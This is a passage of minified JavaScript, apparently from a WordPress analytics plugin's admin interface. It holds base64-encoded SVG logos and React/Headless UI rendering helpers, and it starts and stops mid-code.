LTEuNDgsMS42My0xLjQ4LDIuOTZjMCwuOTcsLjI5LDEuNzEsLjg2LDIuMjQsLjU3LC41MywxLjQzLC43OSwyLjU4LC43OVoiLz4KICAgICAgICA8cGF0aCBkPSJNMjI4LjA0LDgyLjQyaC00LjZ2LTMwLjQ0aDQuNnYzMC40NFoiLz4KICAgICAgICA8cGF0aCBkPSJNMjMxLjMyLDYwLjc4aDUuMDFsNC40LDEyLjI3Yy42NywxLjc1LDEuMTEsMy4zOSwxLjMzLDQuOTNoLjE2Yy4xMi0uNzIsLjMzLTEuNTksLjY1LTIuNjEsLjMxLTEuMDIsMS45Ny01Ljg5LDQuOTctMTQuNThoNC45N2wtOS4yNSwyNC41MWMtMS42OCw0LjUtNC40OSw2Ljc1LTguNDEsNi43NS0xLjAyLDAtMi4wMS0uMTEtMi45Ny0uMzN2LTMuNjRjLjY5LC4xNiwxLjQ4LC4yMywyLjM3LC4yMywyLjIyLDAsMy43OC0xLjI4LDQuNjgtMy44NWwuOC0yLjAzLTguNjktMjEuNjRaIi8+CiAgICAgICAgPHBhdGggZD0iTTI2NC4xNSw3OS4wOWMxLjEyLDAsMi4yNC0uMTgsMy4zNi0uNTN2My40NmMtLjUxLC4yMi0xLjE2LC40MS0xLjk3LC41Ni0uOCwuMTUtMS42MywuMjItMi40OSwuMjItNC4zNiwwLTYuNTMtMi4zLTYuNTMtNi44OXYtMTEuNjZoLTIuOTV2LTIuMDNsMy4xNy0xLjY4LDEuNTctNC41OGgyLjg0djQuODFoNi4xNnYzLjQ4aC02LjE2djExLjU4YzAsMS4xMSwuMjgsMS45MywuODMsMi40NnMxLjI4LC43OSwyLjE4LC43OVoiLz4KICAgICAgICA8cGF0aCBkPSJNMjcxLjU3LDU1LjA1YzAtLjgyLC4yMy0xLjQ1LC42OC0xLjksLjQ1LS40NCwxLjA5LS42NywxLjkzLS42N3MxLjQ0LC4yMiwxLjg5LC42N2MuNDUsLjQ0LC42NywxLjA4LC42NywxLjlzLS4yMywxLjQtLjY3LDEuODVjLS40NSwuNDUtMS4wOCwuNjctMS44OSwuNjdzLTEuNDgtLjIzLTEuOTMtLjY3LS42OC0xLjA3LS42OC0xLjg1Wm00Ljg3LDI3LjM3aC00LjZ2LTIxLjY0aDQuNnYyMS42NFoiLz4KICAgICAgICA8cGF0aCBkPSJNMjkxLjc0LDgyLjgxYy0zLjI3LDAtNS43Ni0uOTYtNy40Ni0yLjg3LTEuNy0xLjkxLTIuNTUtNC42NS0yLjU1LTguMjNzLjg5LTYuNDQsMi42Ny04LjM5YzEuNzgtMS45Niw0LjM1LTIuOTMsNy43Mi0yLjkzLDIuMjgsMCw0LjM0LC40Miw2LjE2LDEuMjdsLTEuMzksMy43Yy0xLjk0LS43Ni0zLjU1LTEuMTMtNC44MS0xLjEzLTMuNzQsMC01LjYxLDIuNDgtNS42MSw3LjQ1LDAsMi40MywuNDcsNC4yNSwxLjQsNS40NywuOTMsMS4yMiwyLjMsMS44Myw0LjEsMS44MywyLjA1LDAsMy45OC0uNTEsNS44MS0xLjUzdjQuMDFjLS44MiwuNDgtMS43LC44My0yLjYzLDEuMDQtLjkzLC4yMS0yLjA2LC4zMS0zLjM5LC4zMVoiLz4KICAgICAgICA8cGF0aCBkPSJNMzE3LjM5LDc2LjI1YzAsMi4xMS0uNzcsMy43My0yLjMxLDQuODYtMS41NCwxLjEzLTMuNzQsMS42OS02LjYxLDEuNjlzLTUuMi0uNDQtNi45NC0xLjMxdi0zLjk3YzIuNTQsMS4xNyw0LjkxLDEuNzYsNy4xLDEuNzYsMi44MywwLDQuMjUtLjg1LDQuMjUtMi41NiwwLS41NS0uMTYtMS0uNDctMS4zN3MtLjgzLS43NC0xLjU1LTEuMTNjLS43Mi0uMzktMS43Mi0uODMtMi45OS0xLjMzLTIuNDktLjk2LTQuMTgtMS45My01LjA2LTIuOS0uODgtLjk2LTEuMzItMi4yMi0xLjMyLTMuNzYsMC0xLjg1LC43NS0zLjI5LDIuMjQtNC4zMSwxLjQ5LTEuMDIsMy41Mi0xLjU0LDYuMDktMS41NHM0Ljk1LC41Miw3LjIyLDEuNTVsLTEuNDksMy40NmMtMi4zMy0uOTctNC4zLTEuNDUtNS44OS0xLjQ1LTIuNDMsMC0zLjY0LC42OS0zLjY0LDIuMDcsMCwuNjgsLjMyLDEuMjUsLjk1LDEuNzIsLjYzLC40NywyLjAxLDEuMTIsNC4xNCwxLjk0LDEuNzksLjY5LDMuMDgsMS4zMiwzLjg5LDEuOSwuODEsLjU3LDEuNDEsMS4yNCwxLjgsMS45OXMuNTksMS42NSwuNTksMi42OVoiLz4KICAgICAgICA8cGF0aCBkPSJNMzMxLjA4LDcxLjQ0YzAtMy40NiwuNTEtNi42OSwxLjUyLTkuNywxLjAxLTMuMDEsMi40Ny01LjY1LDQuMzctNy45Mmg0LjAxYy0xLjgxLDIuNDUtMy4yLDUuMi00LjE3LDguMjUtLjk3LDMuMDUtMS40NSw2LjE2LTEuNDUsOS4zNHMuNDgsNi4yNywxLjQ1LDkuMjVjLjk3LDIuOTksMi4zNCw1LjY5LDQuMTMsOC4xaC0zLjk3Yy0xLjkyLTIuMjItMy4zOC00LjgxLTQuMzgtNy43Ny0xLTIuOTYtMS41MS02LjE0LTEuNTEtOS41NVoiLz4KICAgICAgICA8cGF0aCBkPSJNMzU3LjY1LDY2LjloMTAuNTN2MTQuMzZjLTEuNzIsLjU2LTMuMzcsLjk2LTQuOTYsMS4xOS0xLjU4LC4yMy0zLjMsLjM1LTUuMTQsLjM1LTQuMzMsMC03LjY3LTEuMjgtMTAuMDItMy44NHMtMy41Mi02LjE4LTMuNTItMTAuODUsMS4zMi04LjIxLDMuOTctMTAuODFjMi42NS0yLjYsNi4yOS0zLjksMTAuOTQtMy45LDIuOTksMCw1LjgyLC41Nyw4LjQ5LDEuNzJsLTEuNjQsMy44OWMtMi4zMi0xLjA3LTQuNjQtMS42LTYuOTYtMS42LTMuMDUsMC01LjQ3LC45Ni03LjI0LDIuODgtMS43NywxLjkyLTIuNjYsNC41NC0yLjY2LDcuODYsMCwzLjUsLjgsNi4xNSwyLjQsNy45NywxLjYsMS44MiwzLjksMi43Myw2LjksMi43MywxLjUxLDAsMy4xMy0uMTksNC44NS0uNTd2LTcuMzhoLTUuOTN2LTQuMDFaIi8+CiAgICAgICAgPHBhdGggZD0iTTM5Mi43OSw4Mi40MmwtMi44Ni03Ljk0aC0xMC45NGwtMi44LDcuOTRoLTQuOTNsMTAuNy0yOC43Mmg1LjA5bDEwLjcsMjguNzJoLTQuOTdabS00LjA5LTExLjk3bC0yLjY4LTcuNzljLS4yLS41Mi0uNDctMS4zNC0uODEtMi40Ni0uMzUtMS4xMi0uNTgtMS45NC0uNzEtMi40Ny0uMzUsMS42LS44NywzLjM2LTEuNTUsNS4yNmwtMi41OCw3LjQ1aDguMzNaIi8+CiAgICAgICAgPHBhdGggZD0iTTQxOS45Miw3Ni4xN2gtMy44NXY2LjI0aC00LjQ4di02LjI0aC0xMy4wN3YtMy41NGwxMy4wNy0xOC45aDQuNDh2MTguNjJoMy44NXYzLjgxWm0tOC4zMy0zLjgxdi03LjE4YzAtMi41NiwuMDctNC42NSwuMi02LjI4aC0uMTZjLS4zNywuODYtLjk0LDEuOS0xLjcyLDMuMTNsLTcuMSwxMC4zM2g4Ljc4WiIvPgogICAgICAgIDxwYXRoIGQ9Ik00MzEuNzIsNzEuNDRjMCwzLjQzLS41MSw2LjYzLTEuNTIsOS41OS0xLjAxLDIuOTYtMi40Nyw1LjU0LTQuMzcsNy43M2gtMy45N2MxLjgtMi40NCwzLjE4LTUuMTUsNC4xNC04LjEyLC45Ni0yLjk3LDEuNDQtNi4wNSwxLjQ0LTkuMjNzLS40OC02LjMxLTEuNDUtOS4zNGMtLjk3LTMuMDMtMi4zNS01Ljc4LTQuMTctOC4yNWg0LjAxYzEuOTIsMi4yOCwzLjM4LDQuOTMsNC4zOCw3Ljk1LDEsMy4wMiwxLjUxLDYuMjQsMS41MSw5LjY3WiIvPgogICAgICA8L2c+CiAgICA8L3N5bWJvbD4KICAgIDxzeW1ib2wgaWQ9IlN5bWJvbC1Hb2FsVHJhY2tlciIgdmlld0JveD0iMCAwIDIwNS43IDIwNS42MyI+CiAgICAgIDxnPgogICAgICAgIDxwYXRoIGQ9Ik0xMDIuMTYsMjA1LjYzYy0xOS45LDAtNDMuMTktNS4zOS02MS41OC0xOC44Ni0xNy42LTEyLjg5LTI4LjE2LTMxLjU2LTMwLjU0LTUzLjk3QzMuMyw2OS40Miw1OC42NSw0My4wOSw4OC44NCwzOC4wM2gwYzI1Ljg2LTQuMzIsNTUuODQsMi41Nyw3Ni40MSwxNy42LDE3LjIxLDEyLjU4LDI3LjkyLDMwLjUyLDMwLjk4LDUxLjg4LDcuNzUsNTQuMTItMzMuNTQsODcuODgtNzUuMTgsOTYuMzQtNS42NiwxLjE2LTEyLjA3LDEuNzgtMTguODgsMS43OFptLTEyLjA0LTE2MC4wMmMtMjcuNzMsNC42NS03OC41NiwyOC42OS03Mi40NCw4Ni4zNywyLjE3LDIwLjUsMTEuNDEsMzYuODQsMjcuNDQsNDguNTgsMjIuNzksMTYuNyw1My43OCwxOS45NCw3NC40LDE1Ljc1LDI5LjQ3LTYsNzcuMTktMzEuMjEsNjkuMS04Ny43Mi0yLjgtMTkuNTMtMTIuMTgtMzUuMjctMjcuOS00Ni43Ni0xOC45Ny0xMy44NS00Ni42Ny0yMC4yMy03MC42LTE2LjIyaDBaIi8+CiAgICAgICAgPHBhdGggZD0iTTM1LjI5LDEzNS42YzIuMzYsMzQuMzUsMzcuNzcsNTQuOTQsODMuMSw0Ni4xMSw1MC41Ny05Ljg1LDU5LjA1LTQ0Ljc5LDU1LjU5LTY2Ljk3LTMuNDctMjIuMTgtMjkuNjktNDguMTktNzYuMTQtNDEuMDctNDQuMTcsNi43NS02NC41NiwzMi40LTYyLjU0LDYxLjkzWiIvPgogICAgICAgIDxwYXRoIGNsYXNzPSJjbHMtMiIgZD0iTTc4LjIyLDEyMi43OWMzLjgyLDUuMTksNy42MiwyNy4wOS0zLjM5LDI1LjEyLTEuOTItLjQ3LTMuMi0xLjkyLTMuODItMy42NC0yLjEyLTYuMTMtMy4zMi0xMi43OC0yLjY5LTE5LjMyLC41Ni00Ljk0LDcuMzktNi4zNSw5LjktMi4xNmgwWiIvPgogICAgICAgIDxwYXRoIGNsYXNzPSJjbHMtMiIgZD0iTTEzNy44MywxMTIuMTNjMy43OSw2LjQ5LDQuNTksMTQuMDMsMy4wNCwyMS4zLTEuMTEsNC44My04LjExLDUuMzUtOS45NiwuODItMi40LTYuMjgtMy41OC0xMy4yMi0yLjk2LTE5Ljk2LC41NS00Ljk0LDcuMzgtNi4zNSw5Ljg5LTIuMTZoMFoiLz4KICAgICAgICA8cGF0aCBjbGFzcz0iY2xzLTMiIGQ9Ik05Ni45MSwxMjkuNjdjMy45OSwyLjkzLDkuNjQsMy4zOSwxMy41MywuMTgsMS4zNS0xLDIuNDQtMi4zNywzLjItMy44MywuOTktMS45MiwzLjk5LS44NywzLjYsMS4yMy0xLjM0LDcuNTktMTAuMjUsMTEuODUtMTcuMjEsOS4xMS0yLjItLjgxLTguMjktMy44OC01LjU3LTYuNzIsLjc0LS41OCwxLjc2LS41MywyLjQ1LC4wNGgwWiIvPgogICAgICAgIDxwYXRoIGNsYXNzPSJjbHMtMyIgZD0iTTUwLjIzLDE3Ljg3Yy4wNyw0LjY2LDMwLjQ3LDEyLjI2LDM1LjkyLDExLjY0bC0yLjg5LTI2Ljcycy0zMy4xLDkuNzMtMzMuMDQsMTUuMDhaIi8+CiAgICAgICAgPHBhdGggZD0iTTIzLjMsMTMyLjU2YzEuNzMsMTAuMTEsLjM5LDE4Ljc3LTUuOTYsMTkuODUtNi4zNSwxLjA4LTE1LjMzLTUuODItMTcuMDQtMTUuOTMtMS43My0xMC4xMSw0LjQ1LTE5LjYsMTAuOC0yMC42OCw2LjM1LTEuMDgsMTAuNDgsNi42NCwxMi4yMSwxNi43NVoiLz4KICAgICAgICA8cGF0aCBkPSJNMTgyLjQxLDEwNS40M2MxLjkzLDEwLjA3LDYuMjIsMTcuNzEsMTIuNTUsMTYuNSw2LjMzLTEuMjEsMTIuMzEtMTAuODIsMTAuMzctMjAuOS0xLjkzLTEwLjA3LTExLjAzLTE2Ljc5LTE3LjM3LTE1LjU3LTYuMzIsMS4yMS03LjQ4LDkuOS01LjU1LDE5Ljk3WiIvPgogICAgICAgIDxwYXRoIGQ9Ik05MS41OSw1NC42MmMtMi4zNi0uMjMtNC4zMi0yLjEtNC41OS00LjU1bC00Ljc5LTQ0LjM4Yy0uMy0yLjgyLDEuNzMtNS4zNCw0LjU1LTUuNjVzNS4zNCwxLjczLDUuNjUsNC41NWw0Ljc5LDQ0LjM4Yy4zLDIuODItMS43Myw1LjM0LTQuNTUsNS42NS0uMzYsLjAzLS43MSwuMDMtMS4wNiwwWiIvPgogICAgICA8L2c+CiAgICA8L3N5bWJvbD4KICA8L2RlZnM+CiAgPHBhdGggY2xhc3M9ImNscy0yIiBkPSJNMjIyLjA2LDEyNC45MmMtNS41NC00OC4xNy01OC4yNy03My42OC0xMDMtNjYuMjgtMjguOTgsNC44Ni04Mi4xLDMwLjA1LTc1LjY3LDkwLjYzLDMuNjgsNDUuNjgsNDcuNyw2OS45Nyw4OC4yOCw2OS40NiwzOS40Ny0uMjgsOTkuMTktMjguNDIsOTAuNC05My44MloiLz4KICA8dXNlIHdpZHRoPSIyMDUuNyIgaGVpZ2h0PSIyMDUuNjMiIHRyYW5zZm9ybT0idHJhbnNsYXRlKDI5LjcxIDE3LjEpIiB4bGluazpocmVmPSIjU3ltYm9sLUdvYWxUcmFja2VyIi8+CiAgPHJlY3QgY2xhc3M9ImNscy0xIiB5PSIwIiB3aWR0aD0iOTQ5LjU0IiBoZWlnaHQ9IjI1My41OCIvPgogIDx1c2Ugd2lkdGg9IjQzMy4zMiIgaGVpZ2h0PSI5My43MiIgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoMjkxLjM3IDEzMi44MSkgc2NhbGUoMS4xKSIgeGxpbms6aHJlZj0iI05vQ29kZS1HYTQiLz4KICA8dXNlIHdpZHRoPSI1NjkuNTQiIGhlaWdodD0iODMuOTEiIHRyYW5zZm9ybT0idHJhbnNsYXRlKDI4Mi43MiAyNy40NykiIHhsaW5rOmhyZWY9IiNMb2dvLUdvYWxUcmFja2VyIi8+Cjwvc3ZnPg==";function Qe(){return(0,e.createElement)("div",{"data-component":"PluginHeader",className:o()("flex items-center justify-between","pb-5 pt-10 px-4 xl:px-8")},(0,e.createElement)("img",{className:"w-64 md:w-72 xl:w-96 h-full",src:Ue}),!1)}i.p;const Ge=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M10.293 3.293a1 1 0 011.414 0l6 6a1 1 0 010 1.414l-6 6a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-4.293-4.293a1 1 0 010-1.414z",clipRule:"evenodd"}))})),Pe="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyBpZD0iTGF5ZXJfMSIgZGF0YS1uYW1lPSJMYXllciAxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAxODIuNjMgMTU4LjIyIj4KICA8ZGVmcz4KICAgIDxzdHlsZT4KICAgICAgLmNscy0xIHsKICAgICAgICBmaWxsOiAjZmZmOwogICAgICB9CgogICAgICAuY2xzLTIgewogICAgICAgIGZpbGw6ICNmZmQ0MDA7CiAgICAgIH0KCiAgICAgIC5jbHMtMyB7CiAgICAgICAgZmlsbDogI2VmM2UyZjsKICAgICAgfQoKICAgICAgLmNscy00IHsKICAgICAgICBmaWxsOiAjODY4ZDkzOwogICAgICB9CiAgICA8L3N0eWxlPgogIDwvZGVmcz4KICA8Zz4KICAgIDxnPgogICAgICA8ZWxsaXBzZSBjbGFzcz0iY2xzLTQiIGN4PSI3OS4yNiIgY3k9IjE0OS4yNCIgcng9IjE2LjU1IiByeT0iMS45OCIvPgogICAgICA8Zz4KICAgICAgICA8cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Im05MS43NCw1OWMtMTMuMTgtMy40Mi00MC4wOS0yLjYxLTQ4LjY4LDIzLjgxLTguNTgsMjYuNCwxNS40Nyw0NC42NSwzMS45NSw0OC4zMiwxNi45NCwzLjc4LDQwLjU3LS44Miw0Ny40OS0yNS4wOCw3LjAyLTI0LjU5LTEzLjk2LTQyLjY5LTMwLjc2LTQ3LjA2WiIvPgogICAgICAgIDxwYXRoIGQ9Im04NS42OCwxMzQuMDdjLTMuNzUsMC03LjQ5LS40Mi0xMS4wNi0xLjIyLTEwLjE5LTIuMjctMjMuNTgtMTAuMDMtMzAuNTUtMjIuMjQtNC45Ni04LjctNS45LTE4LjUxLTIuNy0yOC4zNSw5LjA1LTI3Ljg0LDM3LjE5LTI4LjUxLDUwLjgtMjQuOThoMGMxMS42NSwzLjAzLDIyLjk0LDExLjU0LDI4Ljc0LDIxLjY5LDQuODYsOC41LDUuOTksMTguMDMsMy4yNywyNy41Ni01LjYsMTkuNjItMjIuMjYsMjcuNTQtMzguNTIsMjcuNTRabS01Ljg3LTc0Ljc2Yy0xMi45MSwwLTI4LjkxLDUuMDktMzUuMDcsMjQuMDUtMi45Myw5LTIuMTIsMTcuNTksMi40LDI1LjUxLDYuNDMsMTEuMjcsMTguODIsMTguNDQsMjguMjUsMjAuNTQsMTMuNDgsMy4wMSwzOC4yMiwxLjM3LDQ1LjQxLTIzLjg0LDIuNDktOC43MSwxLjUtMTcuMDctMi45NC0yNC44NC01LjM2LTkuMzctMTUuNzktMTcuMjMtMjYuNTYtMjAuMDNoMGMtMy4xNS0uODItNy4xNC0xLjM5LTExLjQ4LTEuMzlaIi8+CiAgICAgIDwvZz4KICAgICAgPHBhdGggZD0ibTUxLjQ0LDg4LjE3Yy01LjQ1LDE0Ljg1LDUuNDksMzAuMzcsMjYuMjEsMzQuOSwyMi4xOCw0Ljg1LDMzLjE1LTcuNzIsMzUuODYtMTcuNjcsMi43LTkuOTUtMy40My0yNS43Ny0yNC4yMy0zMS40OS0xOS43OS01LjQ0LTMzLjE1LDEuNS0zNy44MywxNC4yNloiLz4KICAgICAgPHBhdGggZD0ibTQ3LjM1LDg4LjczYy0xLjE3LDQuNTYtMy4zNSw3Ljk0LTYuMjIsNy4yMXMtNS4zNC01LjMxLTQuMTctOS44Nyw1LjUzLTcuMzgsOC40LTYuNjVjMi44Ny43MywzLjE1LDQuNzUsMS45OCw5LjMxWiIvPgogICAgICA8cGF0aCBjbGFzcz0iY2xzLTMiIGQ9Im03OC4zNiw0N2MtMS4wMSwxLjg5LDkuNTIsMTEuNywxMS44NSwxMi42Nmw1LjQtMTEuMjlzLTE2LjEtMy41NC0xNy4yNi0xLjM3WiIvPgogICAgICA8cGF0aCBkPSJtODkuNTcsNjcuNzZjLS4yNywwLS41NC0uMDUtLjgxLS4xNS0xLjIyLS40NS0xLjg1LTEuOC0xLjQtMy4wMmw1Ljk2LTE2LjIxYy40NS0xLjIyLDEuOC0xLjg1LDMuMDItMS40LDEuMjIuNDUsMS44NSwxLjgsMS40LDMuMDJsLTUuOTYsMTYuMjFjLS4zNS45NS0xLjI1LDEuNTQtMi4yMSwxLjU0WiIvPgogICAgICA8cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Im03NS41MSwxMDMuMDRjMS4xNCwxLjk3LDMuNDQsMy4xOSw1LjY3LDIuNTUuNzYtLjE4LDEuNDYtLjU2LDIuMDUtMS4wMy43NS0uNjQsMS44NS4zOCwxLjMsMS4xOC0xLjk1LDIuOTUtNi40OSwzLjEyLTguOTIuNjktLjc3LS43Mi0yLjc4LTMuMTktMS4xMi0zLjg1LjQyLS4xMS44NC4wOSwxLjAzLjQ2aDBaIi8+CiAgICAgIDxwYXRoIGQ9Im0xMTkuMSwxMDQuMmMtMS4wOCw0LjU5LTEuNTIsOC4zNCwxLjM2LDkuMDEsMi44OC42OCw3LjE5LTIuMjMsOC4yNi02LjgyLDEuMDgtNC41OS0xLjQ5LTkuMTEtNC4zNy05Ljc5LTIuODgtLjY4LTQuMTgsMy01LjI1LDcuNTlaIi8+CiAgICA8L2c+CiAgICA8cG9seWdvbiBjbGFzcz0iY2xzLTIiIHBvaW50cz0iNDIuNDggNjguODggMzAuNzggNjEuNjkgMjAuMzIgNzAuNTkgMjMuNTUgNTcuMjQgMTEuODUgNTAuMDQgMjUuNTQgNDguOTggMjguNzcgMzUuNjMgMzQuMDEgNDguMzMgNDcuNzEgNDcuMjggMzcuMjUgNTYuMTggNDIuNDggNjguODgiLz4KICAgIDxwb2x5Z29uIGNsYXNzPSJjbHMtMiIgcG9pbnRzPSI2Mi4zMSAzNy40MyA1NC4xOCAzMi40MyA0Ni45MSAzOC42MSA0OS4xNiAyOS4zNCA0MS4wMyAyNC4zMyA1MC41NCAyMy42IDUyLjc5IDE0LjMyIDU2LjQzIDIzLjE1IDY1Ljk1IDIyLjQxIDU4LjY4IDI4LjYgNjIuMzEgMzcuNDMiLz4KICAgIDxwb2x5Z29uIGNsYXNzPSJjbHMtMiIgcG9pbnRzPSIxMjcuMzMgNzEgMTI1LjM0IDYxLjY2IDExNS44NCA2MC42NyAxMjQuMTEgNTUuODkgMTIyLjEyIDQ2LjU2IDEyOS4yMSA1Mi45NCAxMzcuNDggNDguMTYgMTMzLjYgNTYuODkgMTQwLjcgNjMuMjcgMTMxLjIgNjIuMjggMTI3LjMzIDcxIi8+CiAgICA8cG9seWdvbiBjbGFzcz0iY2xzLTIiIHBvaW50cz0iMTA0LjA2IDQ1LjQyIDk3Ljg1IDM2LjE3IDg3LjEzIDM5LjIyIDk0LjAxIDMwLjQ1IDg3LjggMjEuMiA5OC4yNiAyNS4wMyAxMDUuMTUgMTYuMjcgMTA0LjczIDI3LjQgMTE1LjE5IDMxLjI0IDEwNC40NyAzNC4yOSAxMDQuMDYgNDUuNDIiLz4KICAgIDxwb2x5Z29uIGNsYXNzPSJjbHMtMiIgcG9pbnRzPSIxNDMuNzYgMTEwLjQ1IDE0Ni4xNSA4OS42MiAxMjcuMDkgODAuOTIgMTQ3LjYzIDc2Ljc1IDE1MC4wMiA1NS45MyAxNjAuMzMgNzQuMTggMTgwLjg3IDcwLjAyIDE2Ni43IDg1LjQ2IDE3Ny4wMSAxMDMuNzIgMTU3Ljk0IDk1LjAxIDE0My43NiAxMTAuNDUiLz4KICAgIDxwb2x5Z29uIGNsYXNzPSJjbHMtMiIgcG9pbnRzPSI3OS4xNCAxNi41OSA3Ny40NSAxMi4xOSA3Mi43NSAxMi40NSA3Ni40IDkuNDggNzQuNzEgNS4wOSA3OC42NiA3LjY0IDgyLjMxIDQuNjcgODEuMSA5LjIyIDg1LjA2IDExLjc4IDgwLjM1IDEyLjA0IDc5LjE0IDE2LjU5Ii8+CiAgICA8cG9seWdvbiBjbGFzcz0iY2xzLTIiIHBvaW50cz0iMzIuMjMgOTYuOTYgMjUuODggOTYuOTIgMjMuODggMTAyLjk1IDIxLjk1IDk2Ljg5IDE1LjYgOTYuODUgMjAuNzYgOTMuMTUgMTguODQgODcuMDkgMjMuOTUgOTAuODYgMjkuMTIgODcuMTYgMjcuMTIgOTMuMTkgMzIuMjMgOTYuOTYiLz4KICAgIDxwb2x5Z29uIGNsYXNzPSJjbHMtMiIgcG9pbnRzPSIxNjIuNTQgNTguNjEgMTYyLjA0IDQ5LjA4IDE1Mi44MiA0Ni42MSAxNjEuNzMgNDMuMTkgMTYxLjIyIDMzLjY1IDE2Ny4yMyA0MS4wNyAxNzYuMTUgMzcuNjQgMTcwLjk1IDQ1LjY1IDE3Ni45NiA1My4wNyAxNjcuNzQgNTAuNiAxNjIuNTQgNTguNjEiLz4KICAgIDxwb2x5Z29uIGNsYXNzPSJjbHMtMiIgcG9pbnRzPSIxMjYuODcgMTQxLjkxIDEyMi42IDEzOS4yOSAxMTguNzkgMTQyLjUzIDExOS45NyAxMzcuNjYgMTE1LjcgMTM1LjA0IDEyMC42OSAxMzQuNjUgMTIxLjg3IDEyOS43OCAxMjMuNzggMTM0LjQyIDEyOC43OCAxMzQuMDMgMTI0Ljk2IDEzNy4yOCAxMjYuODcgMTQxLjkxIi8+CiAgPC9nPgogIDxwYXRoIGNsYXNzPSJjbHMtMyIgZD0ibTcxLjg1LDg4Ljc0Yy0yLjQyLTEuNDMtNC43My41Mi00LjczLjUyLDAsMC0xLjA2LTIuODMtMy44Ny0yLjc3LTIuODEuMDYtNy4yLDQuMTEsMS4wNiwxMy41NiwxMS44Mi00LjIxLDkuOTctOS44OCw3LjU1LTExLjMxaDBaIi8+CiAgPHBhdGggY2xhc3M9ImNscy0zIiBkPSJtMTA1LjY3LDk5LjU2Yy0yLjEzLTEuODQtNC43NS0uMzQtNC43NS0uMzQsMCwwLS41NC0yLjk4LTMuMzItMy40Mi0yLjc4LS40NC03LjgyLDIuNzUtMS4zOSwxMy41MywxMi4zOC0yLjAyLDExLjU4LTcuOTQsOS40NS05Ljc3aDBaIi8+CiAgPHBhdGggY2xhc3M9ImNscy0zIiBkPSJtMTQzLjYsMTkuNDljLTEuODUtMi4xMi01LjE2LS44Ny01LjE2LS44NywwLDAsLjM4LTMuMTUtMi4zMS0zLjk3LTIuNjktLjgzLTguMTIsMS42NC0zLjI2LDEzLjIsMTIuNTQtLjI4LDEyLjU3LTYuMjUsMTAuNzItOC4zNmgwWiIvPgogIDxwYXRoIGNsYXNzPSJjbHMtMyIgZD0ibTE1NS45MSwxMzAuMzZjMS4wMS0yLjYzLTEuNjUtNC45Ni0xLjY1LTQuOTYsMCwwLDIuOTYtMS4xNCwyLjQzLTMuOS0uNTMtMi43Ni01LjI2LTYuNDEtMTMuMTksMy4zMSw2LjEzLDEwLjk1LDExLjQxLDguMTgsMTIuNDIsNS41NWgwWiIvPgogIDxwYXRoIGNsYXNzPSJjbHMtMyIgZD0ibTIxLjY5LDEzLjMxYy0yLjU0LDEuMjItLjU0LDYuMjQtLjU0LDYuMjQsMCwwLTQuNi0yLjctNi4xLS4zMi0xLjUxLDIuMzctLjU4LDguMjcsMTEuODcsNi42NSwzLjA2LTEyLjE3LTIuNjktMTMuNzgtNS4yMi0xMi41NmgwWiIvPgo8L3N2Zz4=",Re=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{d:"M9.049 2.927c.3-.921 1.603-.921 1.902 0l1.07 3.292a1 1 0 00.95.69h3.462c.969 0 1.371 1.24.588 1.81l-2.8 2.034a1 1 0 00-.364 1.118l1.07 3.292c.3.921-.755 1.688-1.54 1.118l-2.8-2.034a1 1 0 00-1.175 0l-2.8 2.034c-.784.57-1.838-.197-1.539-1.118l1.07-3.292a1 1 0 00-.364-1.118L2.98 8.72c-.783-.57-.38-1.81.588-1.81h3.461a1 1 0 00.951-.69l1.07-3.292z"}))})),Fe=()=>(0,e.createElement)("span",{className:"whitespace-pre"},(0,e.createElement)(Re,{className:"h-3 w-3 inline","aria-hidden":"true"}),(0,e.createElement)(Re,{className:"h-3 w-3 inline","aria-hidden":"true"}),(0,e.createElement)(Re,{className:"h-3 w-3 inline","aria-hidden":"true"}),(0,e.createElement)(Re,{className:"h-3 w-3 inline","aria-hidden":"true"}),(0,e.createElement)(Re,{className:"h-3 w-3 inline","aria-hidden":"true"}));function _e(...e){return e.filter(Boolean).join(" ")}function qe(e,t,...r){if(e in t){let a=t[e];return"function"==typeof a?a(...r):a}let a=new Error(`Tried to handle "${e}" but there is no handler defined. Only defined handlers are: ${Object.keys(t).map((e=>`"${e}"`)).join(", ")}.`);throw Error.captureStackTrace&&Error.captureStackTrace(a,qe),a}var Be=(e=>(e[e.None=0]="None",e[e.RenderStrategy=1]="RenderStrategy",e[e.Static=2]="Static",e))(Be||{}),Ze=(e=>(e[e.Unmount=0]="Unmount",e[e.Hidden=1]="Hidden",e))(Ze||{});function We({ourProps:e,theirProps:t,slot:r,defaultTag:a,features:i,visible:n=!0,name:u}){let s=Ve(t,e);if(n)return He(s,r,a,u);let l=null!=i?i:0;if(2&l){let{static:e=!1,...t}=s;if(e)return He(t,r,a,u)}if(1&l){let{unmount:e=!0,...t}=s;return qe(e?0:1,{0:()=>null,1:()=>He({...t,hidden:!0,style:{display:"none"}},r,a,u)})}return He(s,r,a,u)}function He(e,t={},a,i){var n;let{as:u=a,children:s,refName:l="ref",...o}=Ke(e,["unmount","static"]),c=void 0!==e.ref?{[l]:e.ref}:{},L="function"==typeof s?s(t):s;"className"in o&&o.className&&"function"==typeof o.className&&(o.className=o.className(t));let M={};if(t){let e=!1,r=[];for(let[a,i]of Object.entries(t))"boolean"==typeof i&&(e=!0),!0===i&&r.push(a);e&&(M["data-headlessui-state"]=r.join(" "))}if(u===r.Fragment&&Object.keys(Xe(o)).length>0){if(!(0,r.isValidElement)(L)||Array.isArray(L)&&L.length>1)throw new Error(['Passing props on "Fragment"!',"",`The current component <${i} /> is rendering a "Fragment".`,"However we need to passthrough the following props:",Object.keys(o).map((e=>`  - ${e}`)).join("\n"),"","You can apply a few solutions:",['Add an `as="..."` prop, to ensure that we render an actual element instead of a "Fragment".',"Render a single element as the child so that we can forward the props onto that element."].map((e=>`  - ${e}`)).join("\n")].join("\n"));let 